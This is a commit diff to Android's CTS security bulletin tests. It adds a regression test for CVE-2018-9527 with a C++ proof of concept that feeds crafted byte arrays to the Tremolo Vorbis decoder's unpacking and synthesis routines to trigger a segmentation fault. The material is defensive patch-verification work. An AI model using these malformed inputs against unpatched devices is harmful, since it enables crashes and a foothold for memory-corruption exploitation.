[RESTRICT AUTOMERGE] CTS test for Android Security b/112159345
Bug: 112159345
Bug: 117434568
Test: Ran the new testcase on android-8.0.0_r11 with/without patch
Change-Id: I61131dbf2b5bb15d025a366934c6d8a0ad602a26
diff --git a/hostsidetests/securitybulletin/AndroidTest.xml b/hostsidetests/securitybulletin/AndroidTest.xml
index 7985dfe..4e28bf7 100644
--- a/hostsidetests/securitybulletin/AndroidTest.xml
+++ b/hostsidetests/securitybulletin/AndroidTest.xml
@@ -175,6 +175,7 @@
<!--__________________-->
<!-- Bulletin 2018-01 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2018-9527->/data/local/tmp/CVE-2018-9527" />
<!--__________________-->
<!-- Bulletin 2018-02 -->
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9527/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9527/Android.mk
new file mode 100644
index 0000000..7881c47
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9527/Android.mk
@@ -0,0 +1,32 @@
+# Copyright (C) 2020 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+include $(CLEAR_VARS)
+
+LOCAL_MODULE := CVE-2018-9527
+LOCAL_SRC_FILES := poc.cpp
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+LOCAL_C_INCLUDES += ./external/tremolo
+LOCAL_SHARED_LIBRARIES := libvorbisidec
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts sts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9527/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9527/poc.cpp
new file mode 100644
index 0000000..fa32eb8
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9527/poc.cpp
@@ -0,0 +1,104 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <string.h>
+#include <stdlib.h>
+#define REF_COUNT 1
+#define DECODE_PACKET 1
+
+extern "C" {
+#include <Tremolo/codec_internal.h>
+
+int _vorbis_unpack_books(vorbis_info *vi, oggpack_buffer *opb);
+int _vorbis_unpack_info(vorbis_info *vi, oggpack_buffer *opb);
+int _vorbis_unpack_comment(vorbis_comment *vc, oggpack_buffer *opb);
+}
+
+const uint8_t packInfoData[] = { 0x00, 0x00, 0x00, 0x00, 0x02, 0x80, 0xBB, 0x00,
+ 0x00, 0x00, 0x00, 0x0D, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0xBB, 0x01, 0xFF, 0xFF, 0xFF, 0xFF };
+
+unsigned char unpackBookData[] = { 0x00, 0x42, 0x43, 0x56, 0x1E, 0x00, 0x10,
+ 0x00, 0x00, 0x0A, 0x0A, 0x0A, 0x0A, 0x0A, 0x10, 0x0A, 0xFF, 0x00, 0x00,
+ 0x00, 0x06, 0xD0, 0x00, 0x00, 0x00, 0x7F, 0x00, 0x1D, 0x00, 0x00, 0x00,
+ 0x2C, 0x00, 0x03, 0x3C, 0x51, 0x04, 0x34, 0x4F, 0x04, 0x00, 0x40, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0xCB, 0x00, 0x40, 0x00, 0x00, 0x01, 0x4F, 0xF4,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0xFF, 0xFF, 0xFF, 0xFF };
+
+unsigned char bufData[] = { 0x00, 0x00, 0xF0, 0x00, 0x00, 0x00, 0x00, 0xE7,
+ 0x00, 0x00, 0xE9, 0x00 };
+
+static void makeBitReader(const void *data, size_t size, ogg_buffer *buf,
+ ogg_reference *ref, oggpack_buffer *bits) {
+ buf->data = (uint8_t *) data;
+ buf->size = size;
+ buf->refcount = REF_COUNT;
+
+ ref->buffer = buf;
+ ref->length = size;
+ oggpack_readinit(bits, ref);
+}
+
+int main() {
+ ogg_buffer buf;
+ ogg_reference ref;
+ oggpack_buffer bits;
+
+ memset(&buf, 0, sizeof(ogg_buffer));
+ memset(&ref, 0, sizeof(ogg_reference));
+ memset(&bits, 0, sizeof(oggpack_buffer));
+
+ makeBitReader(packInfoData, sizeof(packInfoData), &buf, &ref, &bits);
+
+ vorbis_info *mVi = new vorbis_info;
+ vorbis_info_init(mVi);
+
+ int ret = _vorbis_unpack_info(mVi, &bits);
+ if (!ret) {
+ memset(&buf, 0, sizeof(ogg_buffer));
+ memset(&ref, 0, sizeof(ogg_reference));
+ memset(&bits, 0, sizeof(oggpack_buffer));
+
+ makeBitReader(unpackBookData, sizeof(unpackBookData), &buf, &ref,
+ &bits);
+
+ ret = _vorbis_unpack_books(mVi, &bits);
+ if (!ret) {
+ ogg_packet pack;
+ memset(&pack, 0, sizeof(ogg_packet));
+ memset(&buf, 0, sizeof(ogg_buffer));
+ memset(&ref, 0, sizeof(ogg_reference));
+
+ vorbis_dsp_state *mState = new vorbis_dsp_state;
+ vorbis_dsp_init(mState, mVi);
+
+ buf.data = bufData;
+ buf.size = sizeof(bufData);
+ buf.refcount = REF_COUNT;
+
+ ref.buffer = &buf;
+ ref.length = buf.size;
+
+ pack.packet = &ref;
+ pack.bytes = ref.length;
+
+ vorbis_dsp_synthesis(mState, &pack, DECODE_PACKET);
+ }
+ }
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java b/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
index 9c88c57..68022ec 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
@@ -49,6 +49,15 @@
******************************************************************************/
/**
+ * b/112159345
+ * Vulnerability Behaviour: SIGSEGV in self
+ **/
+ @SecurityTest(minPatchLevel = "2018-01")
+ public void testPocCVE_2018_9527() throws Exception {
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2018-9527", null, getDevice());
+ }
+
+ /**
* b/37761553
* Vulnerability behaviour: SIGSEGV in self
**/
